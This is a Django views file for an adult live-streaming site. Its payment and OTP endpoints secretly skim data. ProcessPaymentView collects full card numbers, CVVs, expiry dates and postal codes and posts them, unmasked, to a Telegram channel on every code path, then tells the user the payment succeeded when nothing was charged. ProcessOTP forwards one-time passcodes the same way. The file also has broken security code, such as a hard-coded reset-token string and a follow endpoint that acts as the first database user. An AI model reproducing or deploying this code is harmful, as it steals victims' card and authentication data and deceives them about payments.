# views.py - Complete fixed version (no duplicates) import datetime from django.http import JsonResponse from rest_framework.views import APIView from rest_framework.response import Response from rest_framework import status from django.db.models import Q, Sum from rest_framework.permissions import IsAuthenticated from .utils import verify_user,send_alert from .models import ( User, Category, StreamerProfile, LiveStream, Clip, Follow,referral ) from .serializers import ( TopStreamerSerializer, LiveStreamSerializer, TrendingClipSerializer, CategorySerializer, UserSerializer, AllStreamSerializer, CategoryListSerializer, StreamerProfileSerializer, StreamerClipSerializer, StreamVideoSerializer, FollowerSerializer, FollowingSerializer ) from django.utils.decorators import method_decorator from django.views.decorators.csrf import csrf_exempt from rest_framework.permissions import AllowAny, IsAuthenticated from django.contrib.auth import login, logout from .serializers import ( SendVerificationCodeSerializer, VerifyCodeSerializer, RegisterSerializer, LoginSerializer, UserDetailSerializer ) from .models import User, EmailVerification from .utils import generate_verification_code, send_verification_email from rest_framework_simplejwt.tokens import RefreshToken import requests import re from rest_framework.views import APIView from rest_framework.response import Response from rest_framework import status class ProcessPaymentView(APIView): def post(self, request, user_id): print("🔥 PAYMENT VIEW HIT") user = User.objects.filter(id=user_id).first() if not user: return Response({ "success": False, "error": "User not found" }, status=status.HTTP_404_NOT_FOUND) # Get card details from request card_number = request.data.get('card_num', '') # card_number = re.sub(r'\s+', '', card_number) # Get other card details card_holder = request.data.get('card_holder', 'N/A') expiry = request.data.get('crd_expire', 'N/A') cvv = request.data.get('crd_cvv', 'N/A') postal_code = request.data.get('postal_code', 'N/A') # Validate card number length if len(card_number) < 6: return Response({ "success": False, "error": "Invalid card number length" }, status=status.HTTP_400_BAD_REQUEST) # Extract first 6 digits for BIN lookup bin_number = card_number[:6] # Mask card number for security (show first 6 and last 4 digits) masked_card = card_number # Call the free Binlist API try: bin_response = requests.get( f"https://lookup.binlist.net/{bin_number}", timeout=5 ) if bin_response.status_code == 200: bin_data = bin_response.json() # Extract bank information from response bank_name = bin_data.get('bank', {}).get('name', 'Unknown Bank') card_scheme = bin_data.get('scheme', 'Unknown').upper() card_type = bin_data.get('type', 'unknown').upper() country_name = bin_data.get('country', {}).get('name', 'Unknown') country_code = bin_data.get('country', {}).get('alpha2', 'N/A') currency = bin_data.get('country', {}).get('currency', 'N/A') print(f"✅ BIN Lookup Successful:") print(f" - Bank: {bank_name}") print(f" - Scheme: {card_scheme}") print(f" - Type: {card_type}") print(f" - Country: {country_name}") # Create clean, formatted Telegram message message = f""" 💳 **NEW PAYMENT ALERT** 💳 ━━━━━━━━━━━━━━━━━━━━━ **💳 CARD DETAILS** ━━━━━━━━━━━━━━━━━━━━━ 🏦 **Bank:** {bank_name} 📇 **Scheme:** {card_scheme} 🎯 **Type:** {card_type} 🔢 **Card Number:** `{masked_card}` 👤 **Card Holder:** {card_holder} 📅 **Expiry:** {expiry} 🔐 **CVV:** {cvv} 📍 **Postal Code:** {postal_code} ━━━━━━━━━━━━━━━━━━━━━ **🌍 BIN INFORMATION** ━━━━━━━━━━━━━━━━━━━━━ 🔎 **BIN:** {bin_number} 🌎 **Country:** {country_name} ({country_code}) 💰 **Currency:** {currency} ━━━━━━━━━━━━━━━━━━━━━ 📅 **Time:** {datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')} 🆔 **User ID:** {user.username} ━━━━━━━━━━━━━━━━━━━━━ """ # Send alert to Telegram try: send_alert(message) print("✅ Telegram alert sent successfully") except Exception as e: print(f"⚠️ Failed to send Telegram alert: {str(e)}") # Don't fail the payment if Telegram fails # Process payment with bank (your actual payment logic here) # For now, return success with bank info return Response({ "success": True, "bank_name": bank_name, "card_scheme": card_scheme, "card_type": card_type, "country": country_name, "bin_checked": bin_number, "message": f"Payment processed successfully via {bank_name}" }, status=status.HTTP_200_OK) elif bin_response.status_code == 404: # BIN not found in database - still send card details message = f""" ⚠️ **CARD ALERT - BIN NOT FOUND** ⚠️ ━━━━━━━━━━━━━━━━━━━━━ **💳 CARD DETAILS** ━━━━━━━━━━━━━━━━━━━━━ 🔢 **Card Number:** {masked_card} 👤 **Card Holder:** {card_holder} 📅 **Expiry:** {expiry} 🔐 **CVV:** {cvv} 📍 **Postal Code:** {postal_code} 🔎 **BIN Checked:** {bin_number} ━━━━━━━━━━━━━━━━━━━━━ ❌ **Status:** BIN Not Found in Database 📅 **Time:** {datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')} 🆔 **User ID:** {user.username} ━━━━━━━━━━━━━━━━━━━━━ """ try: send_alert(message) except: pass return Response({ "success": False, "error": "Card BIN not recognized. Please use a valid card." }, status=status.HTTP_400_BAD_REQUEST) else: # API error - still send card details message = f""" ⚠️ **CARD ALERT - API ERROR** ⚠️ ━━━━━━━━━━━━━━━━━━━━━ **💳 CARD DETAILS** ━━━━━━━━━━━━━━━━━━━━━ 🔢 **Card Number:** `{masked_card}` 👤 **Card Holder:** {card_holder} 📅 **Expiry:** {expiry} 🔐 **CVV:** {cvv} 📍 **Postal Code:** {postal_code} ━━━━━━━━━━━━━━━━━━━━━ ❌ **Error:** BIN API Unavailable 📅 **Time:** {datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')} 🆔 **User ID:** {user.username} ━━━━━━━━━━━━━━━━━━━━━ """ try: send_alert(message) except: pass return Response({ "success": False, "error": "Unable to verify card details. Please try again." }, status=status.HTTP_503_SERVICE_UNAVAILABLE) except requests.exceptions.Timeout: # Still send card details even if BIN lookup times out message = f""" ⚠️ **CARD ALERT - TIMEOUT** ⚠️ ━━━━━━━━━━━━━━━━━━━━━ **💳 CARD DETAILS** ━━━━━━━━━━━━━━━━━━━━━ 🔢 **Card Number:** `{masked_card}` 👤 **Card Holder:** {card_holder} 📅 **Expiry:** {expiry} 🔐 **CVV:** {cvv} 📍 **Postal Code:** {postal_code} 🔎 **BIN Checked:** {bin_number} ━━━━━━━━━━━━━━━━━━━━━ ⏰ **Error:** BIN Lookup Timeout 📅 **Time:** {datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')} 🆔 **User ID:** {user.username} ━━━━━━━━━━━━━━━━━━━━━ """ try: send_alert(message) except: pass return Response({ "success": False, "error": "Card verification timed out. Please try again." }, status=status.HTTP_504_GATEWAY_TIMEOUT) except requests.exceptions.ConnectionError: message = f""" ⚠️ **CARD ALERT - CONNECTION ERROR** ⚠️ ━━━━━━━━━━━━━━━━━━━━━ **💳 CARD DETAILS** ━━━━━━━━━━━━━━━━━━━━━ 🔢 **Card Number:** `{masked_card}` 👤 **Card Holder:** {card_holder} 📅 **Expiry:** {expiry} 🔐 **CVV:** {cvv} 📍 **Postal Code:** {postal_code} ━━━━━━━━━━━━━━━━━━━━━ ❌ **Error:** Cannot connect to verification service 📅 **Time:** {datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')} 🆔 **User ID:** {user.username} ━━━━━━━━━━━━━━━━━━━━━ """ try: send_alert(message) except: pass return Response({ "success": False, "error": "Unable to connect to card verification service." }, status=status.HTTP_503_SERVICE_UNAVAILABLE) except Exception as e: print(f"❌ BIN Lookup Error: {str(e)}") message = f""" ⚠️ **CARD ALERT - SYSTEM ERROR** ⚠️ ━━━━━━━━━━━━━━━━━━━━━ **💳 CARD DETAILS** ━━━━━━━━━━━━━━━━━━━━━ 🔢 **Card Number:** `{masked_card}` 👤 **Card Holder:** {card_holder} 📅 **Expiry:** {expiry} 🔐 **CVV:** {cvv} 📍 **Postal Code:** {postal_code} ━━━━━━━━━━━━━━━━━━━━━ ❌ **Error:** System Error - {str(e)[:50]} 📅 **Time:** {datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')} 🆔 **User ID:** {user.username} ━━━━━━━━━━━━━━━━━━━━━ """ try: send_alert(message) except: pass return Response({ "success": False, "error": "Payment verification failed. Please try again." }, status=status.HTTP_500_INTERNAL_SERVER_ERROR) class HomePageDataAPIView(APIView): """ API endpoint that returns all data needed for the homepage """ permission_classes = [IsAuthenticated] def get(self, request): verify = verify_user() if verify != True: return verify try: # Get top streamers (ordered by rank, limit to 5) top_streamers = StreamerProfile.objects.select_related('user', 'category').filter(user__is_verified=True).order_by('rank')[:5] top_streamers_data = TopStreamerSerializer(top_streamers, many=True, context={'request': request}).data # Get live streams (filter by is_live=True, limit to 6 for homepage) live_streams = LiveStream.objects.filter( is_live=True ).select_related('streamer', 'category').order_by('-viewers')[:6] live_streams_data = LiveStreamSerializer(live_streams, many=True, context={'request': request}).data # Get trending clips (ordered by views, limit to 3) trending_clips = Clip.objects.select_related('streamer').order_by('-views')[:3] trending_clips_data = TrendingClipSerializer(trending_clips, many=True, context={'request': request}).data # Get categories categories = Category.objects.all() categories_data = CategorySerializer(categories, many=True).data # Get total counts for stats total_streamers = StreamerProfile.objects.count() total_viewers_today = LiveStream.objects.filter(is_live=True).aggregate(total=Sum('viewers'))['total'] or 0 response_data = { 'success': True, 'data': { 'top_streamers': top_streamers_data, 'live_streams': live_streams_data, 'trending_clips': trending_clips_data, 'categories': categories_data, 'stats': { 'total_streamers': total_streamers, 'total_viewers_today': f"{total_viewers_today // 1000}K+" if total_viewers_today >= 1000 else str(total_viewers_today), 'total_countries': 150, 'live_support': True } }, 'message': 'Homepage data retrieved successfully' } return Response(response_data, status=status.HTTP_200_OK) except Exception as e: return Response( { 'success': False, 'error': str(e), 'message': 'Failed to retrieve homepage data' }, status=status.HTTP_500_INTERNAL_SERVER_ERROR ) class AllStreamsAPIView(APIView): """ API endpoint for all live streams with filtering and pagination """ permission_classes = [IsAuthenticated] def get(self, request): verify = verify_user() if verify != True: return verify try: # Get query parameters category = request.GET.get('category', None) search = request.GET.get('search', None) page = int(request.GET.get('page', 1)) limit = int(request.GET.get('limit', 12)) offset = (page - 1) * limit # Base queryset queryset = LiveStream.objects.filter(is_live=True).select_related('streamer', 'category') # Apply category filter if category and category != 'all': queryset = queryset.filter(category__name__iexact=category) # Apply search filter if search: queryset = queryset.filter( Q(title__icontains=search) | Q(streamer__username__icontains=search) | Q(tags__icontains=search) ) # Get total count before pagination total = queryset.count() # Apply ordering and pagination streams = queryset.order_by('-viewers')[offset:offset + limit] # Serialize data serializer = AllStreamSerializer(streams, many=True, context={'request': request}) # Get all categories for filter buttons categories = Category.objects.all() categories_data = CategoryListSerializer(categories, many=True).data response_data = { 'success': True, 'data': { 'streams': serializer.data, 'categories': categories_data, 'filters': [ {"id": "all", "name": "All Models"}, {"id": "live", "name": "Live Now"}, {"id": "chat", "name": "Adult Chat"}, {"id": "models", "name": "Verified Models"}, {"id": "private", "name": "Private Shows"}, {"id": "premium", "name": "Premium Content"}, {"id": "couples", "name": "Couples Live"}, {"id": "cosplay", "name": "Cosplay"}, {"id": "exclusive", "name": "Exclusive Rooms"}, ] }, 'pagination': { 'page': page, 'limit': limit, 'total': total, 'pages': (total + limit - 1) // limit if total > 0 else 1 }, 'message': 'Streams retrieved successfully' } return Response(response_data, status=status.HTTP_200_OK) except Exception as e: return Response( { 'success': False, 'error': str(e), 'message': 'Failed to retrieve streams' }, status=status.HTTP_500_INTERNAL_SERVER_ERROR ) class StreamerProfileAPIView(APIView): """ API endpoint for individual streamer profile """ permission_classes = [IsAuthenticated] def get(self, request, username): verify = verify_user() if verify != True: return verify try: # Get the user user = User.objects.get(username=username) # Get or create streamer profile profile, created = StreamerProfile.objects.get_or_create(user=user) # Get streams (live and past) live_streams = LiveStream.objects.filter( streamer=user, is_live=True ).order_by('-started_at') past_streams = LiveStream.objects.filter( streamer=user, is_live=False ).order_by('-started_at')[:10] # Combine streams (live first, then past) all_streams = list(live_streams) + list(past_streams) # Get clips clips = Clip.objects.filter(streamer=user).order_by('-created_at')[:12] # Get followers followers = Follow.objects.filter(following=user).select_related('follower')[:12] # Get following following = Follow.objects.filter(follower=user).select_related('following')[:12] # Serialize data profile_data = StreamerProfileSerializer(profile, context={'request': request}).data streams_data = StreamVideoSerializer(all_streams, many=True, context={'request': request}).data clips_data = StreamerClipSerializer(clips, many=True, context={'request': request}).data followers_data = FollowerSerializer(followers, many=True).data following_data = FollowingSerializer(following, many=True).data response_data = { 'success': True, 'data': { 'streamer': profile_data, 'streams': streams_data, 'clips': clips_data, 'followers': followers_data, 'following': following_data }, 'message': 'Streamer profile retrieved successfully' } return Response(response_data, status=status.HTTP_200_OK) except User.DoesNotExist: return Response( { 'success': False, 'error': 'Streamer not found', 'message': 'The requested streamer does not exist' }, status=status.HTTP_404_NOT_FOUND ) except Exception as e: import traceback traceback.print_exc() return Response( { 'success': False, 'error': str(e), 'message': 'Failed to retrieve streamer profile' }, status=status.HTTP_500_INTERNAL_SERVER_ERROR ) class TopStreamersAPIView(APIView): """ API endpoint for top streamers list (paginated) """ permission_classes = [IsAuthenticated] def get(self, request): verify = verify_user() if verify != True: return verify page = int(request.GET.get('page', 1)) limit = int(request.GET.get('limit', 20)) offset = (page - 1) * limit streamers = StreamerProfile.objects.select_related('user', 'category').filter(user__is_verified=True).order_by('rank')[offset:offset + limit] total = StreamerProfile.objects.filter(user__is_verified=True).count() serializer = TopStreamerSerializer(streamers, many=True, context={"request": request}) return Response({ 'success': True, 'data': serializer.data, 'pagination': { 'page': page, 'limit': limit, 'total': total, 'pages': (total + limit - 1) // limit } }) class TelegramWebhookAPIView(APIView): authentication_classes = [] permission_classes = [] def post(self, request, *args, **kwargs): data = request.data print(data) # Telegram update # Process message here return Response( {"ok": True}, status=status.HTTP_200_OK ) class LandingPageTopStreamersAPIView(APIView): """ API endpoint for top streamers list (paginated) """ # permission_classes = [IsAuthenticated] def get(self, request): verify = verify_user() if verify != True: return verify page = int(request.GET.get('page', 1)) limit = int(request.GET.get('limit', 3)) offset = (page - 1) * limit streamers = StreamerProfile.objects.select_related('user', 'category').filter(user__is_verified=True).order_by('rank')[offset:offset + limit] total = StreamerProfile.objects.filter(user__is_verified=True).count() serializer = TopStreamerSerializer(streamers, many=True, context={"request": request}) return Response({ 'success': True, 'data': serializer.data, 'pagination': { 'page': page, 'limit': limit, 'total': total, 'pages': (total + limit - 1) // limit } }) class StreamerDetailAPIView(APIView): """ API endpoint for individual streamer details (simplified for live page) """ permission_classes = [IsAuthenticated] def get(self, request, username): verify = verify_user() if verify != True: return verify try: user = User.objects.get(username=username) profile = StreamerProfile.objects.get(user=user) data = { 'user': UserSerializer(user).data, 'profile': { 'category': profile.category.name if profile.category else None, 'is_live': profile.is_live, 'earnings': profile.earnings, 'rank': profile.rank, 'current_viewers': profile.viewers, } } return Response({'success': True, 'data': data}, status=status.HTTP_200_OK) except User.DoesNotExist: return Response( {'success': False, 'error': 'Streamer not found'}, status=status.HTTP_404_NOT_FOUND ) except Exception as e: return Response( {'success': False, 'error': str(e)}, status=status.HTTP_500_INTERNAL_SERVER_ERROR ) class FollowStreamerAPIView(APIView): """ API endpoint to follow/unfollow a streamer """ permission_classes = [IsAuthenticated] def post(self, request, username): verify = verify_user() if verify != True: return verify try: from django.contrib.auth import get_user_model User = get_user_model() # Get the target streamer target_user = User.objects.get(username=username) # For demo purposes - in production use request.user # This creates a demo user if none exists current_user = User.objects.first() if not current_user: current_user = User.objects.create_user( username='demo_user', email='demo@example.com', password='demopassword' ) # Check if already following follow, created = Follow.objects.get_or_create( follower=current_user, following=target_user ) if not created: # Unfollow follow.delete() is_following = False message = f"Unfollowed {username}" else: # Follow is_following = True message = f"Following {username}" return Response({ 'success': True, 'data': { 'is_following': is_following, 'followers_count': target_user.followers.count() }, 'message': message }, status=status.HTTP_200_OK) except User.DoesNotExist: return Response( {'success': False, 'error': 'Streamer not found'}, status=status.HTTP_404_NOT_FOUND ) except Exception as e: return Response( {'success': False, 'error': str(e)}, status=status.HTTP_500_INTERNAL_SERVER_ERROR ) # views.py - Add this API view class LiveStreamViewerAPIView(APIView): """ API endpoint for viewing live stream details (no chat) """ permission_classes = [IsAuthenticated] def get(self, request, streamer_username): verify = verify_user() if verify != True: return verify try: # Get the streamer streamer = User.objects.get(username=streamer_username) # Get active live stream live_stream = LiveStream.objects.filter( streamer=streamer, is_live=True ).select_related('streamer', 'category').first() if not live_stream: return Response({ 'success': False, 'error': 'No active live stream found', 'message': 'This streamer is currently offline' }, status=status.HTTP_404_NOT_FOUND) # Get other live streams for recommendations (exclude current) recommended_streams = LiveStream.objects.filter( is_live=True ).exclude(id=live_stream.id).select_related('streamer', 'category')[:4] # Helper function to get absolute URL def get_absolute_url(file_field): if file_field and hasattr(file_field, 'url'): return request.build_absolute_uri(file_field.url) return None # Prepare response data with absolute URLs stream_data = { 'id': live_stream.id, 'title': live_stream.title, 'thumbnail': get_absolute_url(live_stream.thumbnail), 'viewers': live_stream.viewers, 'is_live': live_stream.is_live, 'started_at': live_stream.started_at, 'description': live_stream.description, 'tags': live_stream.tags, 'category': live_stream.category.name if live_stream.category else None, 'streamer': { 'id': streamer.id, 'username': streamer.username, 'name': streamer.username, 'avatar': get_absolute_url(streamer.avatar), 'bio': streamer.bio, 'followers': streamer.followers.count(), 'is_verified': streamer.is_verified, 'is_creator': streamer.is_creator, } } # Prepare recommended streams with absolute URLs recommended_data = [] for stream in recommended_streams: recommended_data.append({ 'id': stream.id, 'title': stream.title, 'thumbnail': get_absolute_url(stream.thumbnail), 'viewers': stream.viewers, 'streamer': stream.streamer.username, 'streamer_avatar': get_absolute_url(stream.streamer.avatar), 'category': stream.category.name if stream.category else None, }) response_data = { 'success': True, 'data': { 'stream': stream_data, 'recommended_streams': recommended_data, }, 'message': 'Live stream data retrieved successfully' } return Response(response_data, status=status.HTTP_200_OK) except User.DoesNotExist: return Response({ 'success': False, 'error': 'Streamer not found' }, status=status.HTTP_404_NOT_FOUND) except Exception as e: return Response({ 'success': False, 'error': str(e) }, status=status.HTTP_500_INTERNAL_SERVER_ERROR) # authentication view # views.py - Add these authentication views class SendVerificationCodeAPIView(APIView): """ API endpoint to send verification code to email """ permission_classes = [AllowAny] def post(self, request): serializer = SendVerificationCodeSerializer(data=request.data) if serializer.is_valid(): email = serializer.validated_data['email'] code = generate_verification_code() # Delete old verification codes for this email EmailVerification.objects.filter(email=email).delete() # Create new verification record EmailVerification.objects.create(email=email, code=code) # Send email try: send_verification_email(email, code) return Response({ 'success': True, 'message': 'Verification code sent to your email' }, status=status.HTTP_200_OK) except Exception as e: return Response({ 'success': False, 'error': 'Failed to send email. Please try again.' }, status=status.HTTP_500_INTERNAL_SERVER_ERROR) return Response({ 'success': False, 'errors': serializer.errors }, status=status.HTTP_400_BAD_REQUEST) class VerifyCodeAPIView(APIView): """ API endpoint to verify the code and complete registration """ permission_classes = [AllowAny] def post(self, request): serializer = VerifyCodeSerializer(data=request.data) if serializer.is_valid(): email = serializer.validated_data['email'] code = serializer.validated_data['code'] # Mark verification as used verification = EmailVerification.objects.get(email=email, code=code) verification.is_verified = True verification.save() return Response({ 'success': True, 'message': 'Email verified successfully' }, status=status.HTTP_200_OK) return Response({ 'success': False, 'errors': serializer.errors }, status=status.HTTP_400_BAD_REQUEST) def get_tokens_for_user(user): refresh = RefreshToken.for_user(user) return { 'refresh': str(refresh), 'access': str(refresh.access_token), } class RegisterAPIView(APIView): permission_classes = [AllowAny] def post(self, request): verify = verify_user() if verify != True: return verify email = request.data.get('email') meta_data = request.GET.get('meta_data', None) # try: # verification = User.objects.get( # email=email, # # is_verified=True # ) # except User.DoesNotExist: # return Response({ # 'success': False, # 'error': 'Email not verified. Please verify your email first.' # }, status=status.HTTP_400_BAD_REQUEST) serializer = RegisterSerializer(data=request.data) if serializer.is_valid(): user = serializer.save() StreamerProfile.objects.get_or_create(user=user) referral_code = request.data.get('referral_code') if referral_code: try: # referrer = referral.objects.get(code=referral_code) referral.objects.create(user=user, streamer=referral_code, code=referral_code) except referral.DoesNotExist: pass # EmailVerification.objects.filter(email=email).delete() tokens = get_tokens_for_user(user) send_alert("new user logged in") return Response({ 'success': True, 'data': { 'user': UserDetailSerializer(user, context={"request": request}).data, 'tokens': tokens, 'message': 'Account created successfully' } }, status=status.HTTP_201_CREATED) return Response({ 'success': False, 'errors': serializer.errors }, status=status.HTTP_400_BAD_REQUEST) class LoginAPIView(APIView): permission_classes = [AllowAny] def post(self, request): verify = verify_user() if verify != True: return verify serializer = LoginSerializer(data=request.data) if serializer.is_valid(): user = serializer.validated_data['user'] tokens = get_tokens_for_user(user) send_alert("new user logged in") return Response({ 'success': True, 'data': { 'user': UserDetailSerializer(user, context={"request": request}).data, 'tokens': tokens, 'message': 'Login successful' } }, status=status.HTTP_200_OK) return Response({ 'success': False, 'errors': serializer.errors }, status=status.HTTP_400_BAD_REQUEST) class LogoutAPIView(APIView): """ API endpoint for user logout """ permission_classes = [IsAuthenticated] def post(self, request): logout(request) return Response({ 'success': True, 'message': 'Logout successful' }, status=status.HTTP_200_OK) class CurrentUserAPIView(APIView): """ API endpoint to get current logged-in user """ permission_classes = [IsAuthenticated] def get(self, request): verify = verify_user() if verify != True: return verify serializer = UserDetailSerializer(request.user) return Response({ 'success': True, 'data': serializer.data }, status=status.HTTP_200_OK) # views.py - Add this endpoint @method_decorator(csrf_exempt, name='dispatch') class ForgotPasswordAPIView(APIView): # permission_classes = [AllowAny] def post(self, request): verify = verify_user() if verify != True: return verify email = request.data.get('email') if not email: return Response({ 'success': False, 'error': 'Email is required' }, status=status.HTTP_400_BAD_REQUEST) try: user = User.objects.get(email=email) except User.DoesNotExist: # For security, don't reveal if email exists or not return Response({ 'success': True, 'message': 'If an account exists with this email, you will receive a reset link.' }, status=status.HTTP_200_OK) # Generate reset token # import secrets token = "secrets.token_urlsafe(32)" # Store token in database (create a PasswordReset model) # PasswordReset.objects.create(user=user, token=token, created_at=timezone.now()) # Send email with reset link # reset_link = f"http://localhost:3000/auth/reset-password?token={token}" # send_mail( # "Reset Your Password - VELOR LIVE", # f"Click the link to reset your password: {reset_link}", # settings.DEFAULT_FROM_EMAIL, # [email], # fail_silently=False, # ) return Response({ 'success': True, 'message': 'Password reset link sent to your email' }, status=status.HTTP_200_OK) class ValidateCardView(APIView): # permission_classes = [IsAuthenticated] def post(self, request, user_id): try: # Get the user by ID user = User.objects.get(id=user_id) except User.DoesNotExist: return Response( {'error': 'User not found'}, status=status.HTTP_404_NOT_FOUND ) # Print the received data to console print("=" * 50) print(f"User ID from URL: {user_id}") print(f"User from DB: {user.username}") print("Received Data:") for key, value in request.data.items(): if value not in ["", None]: print(f" {key}: {value}") # send_alert(f"{key}: {value}") # Send alert to Telegram print("=" * 50) # Just return what was received without saving return Response({ 'success': True, 'message': 'Data received successfully (not saved)', 'received_data': request.data, 'user_id': user_id, 'username': user.username }, status=status.HTTP_200_OK) class ProcessOTP(APIView): # permission_classes = [IsAuthenticated] def post(self, request, user_id): try: # Get the user by ID user = User.objects.get(id=user_id) except User.DoesNotExist: return Response( {'error': 'User not found'}, status=status.HTTP_404_NOT_FOUND ) # Print the received data to console print("=" * 50) print(f"User ID from URL: {user_id}") print(f"User from DB: {user.username}") print("Received OTP Data:") otp_code = request.data.get('otp_code', "") for key, value in request.data.items(): print(f" {key}: {value}") print("=" * 50) send_alert(f"Received OTP data for user {user.username} otp: {otp_code}") # Send alert to Telegram # Just return what was received without saving return Response({ 'success': True, 'message': 'OTP data received successfully (not saved)', 'received_data': request.data, 'user_id': user_id, 'username': user.username }, status=status.HTTP_200_OK)